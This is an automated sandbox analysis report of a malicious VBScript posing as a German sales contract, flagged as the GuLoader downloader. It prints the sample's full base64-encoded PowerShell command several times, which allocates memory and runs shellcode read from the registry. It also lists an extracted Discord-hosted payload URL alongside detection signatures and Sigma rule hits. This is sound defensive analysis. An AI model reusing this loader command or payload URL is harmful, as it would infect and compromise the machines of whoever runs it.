Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs

Overview

General Information

Sample Name:tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Analysis ID:560422
MD5:b8fbb413a49b2f05872cb38372454664
SHA1:2071d3476c94b3cfc924b31c705806e78df674a8
SHA256:cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4676 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAUwB0AGUAbgBmAC4ATABlAG4AZwB0AGgAIAAvACAAMgApAA0ACgANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABTAHQAZQBuAGYALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVABBAEwAQQBSAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAUwB0AGUAbgBmAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQATAB5AGsAawBlAGQAcgBtAGIAPQAwADsAIAAkAEwAeQBrAGsAZQBkAHIAbQBiACAALQBsAHQAIAAkAFQAQQBMAEEAUgAuAGMAbwB1AG4AdAAgADsAIAAkAEwAeQBrAGsAZQBkAHIAbQBiACsAKwApAA0ACgB7AA0ACgAJAA0ACgBbAFMAWQBEAFkARQBNAEUATgBJAFQAMQBdADoAOgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgAJABTAFkARABZAEUATQBFAE4ASQBUADMAKwAkAEwAeQBrAGsAZQBkAHIAbQBiACwAWwByAGUAZgBdACQAVABBAEwAQQBSAFsAJABMAHkAawBrAGUAZAByAG0AYgBdACwAMQApAA0ACgANAAoAfQANAAoAWwBTAFkARABZAEUATQBFAE4ASQBUADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQA
    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAUwB0A
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAUwB0A
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132877116867900207.7148.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://cdn.discordapp.com/attachments/933089228261294143/9
    Source: powershell.exe, 00000005.00000002.887747537.0000000008140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000005.00000002.876857673.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
